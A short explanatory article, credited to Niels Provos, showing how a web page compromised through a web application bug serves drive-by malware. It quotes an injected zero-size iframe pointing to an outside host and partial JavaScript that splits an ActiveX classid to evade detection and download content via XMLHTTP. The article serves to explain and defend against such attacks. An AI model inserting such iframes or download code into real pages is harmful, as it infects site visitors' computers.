Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Movable Type or many others, the adversary was able to insert the following line of HTML into your home page:
<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>
[many more lines of numbers]
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();
All of this with just a single line of HTML. Amazing? Right!
The actual example had some more indirections and also threw in some additional Visual Basic Script plus some other goodies that would have complicated our explanation.
Article written by: Niels Provos